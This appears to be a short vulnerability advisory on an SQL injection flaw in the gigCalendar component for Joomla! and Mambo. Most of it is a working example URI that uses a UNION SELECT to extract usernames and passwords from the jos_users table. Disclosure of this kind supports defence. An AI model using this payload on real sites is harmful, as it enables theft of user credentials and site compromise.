Joomla! and Mambo gigCalendar Component 'banddetails.php' SQL Injection Vulnerability

info
discussion
exploit
solution
references

Joomla! and Mambo gigCalendar Component 'banddetails.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/path/index.php?option=com_gigcal&task=details&gigcal_bands_id=-1'
UNION ALL SELECT 1,2,3,4,5,concat('username: ', username),concat('password: ', password),NULL,NULL,NULL,NULL,NULL,NULL from jos_users%23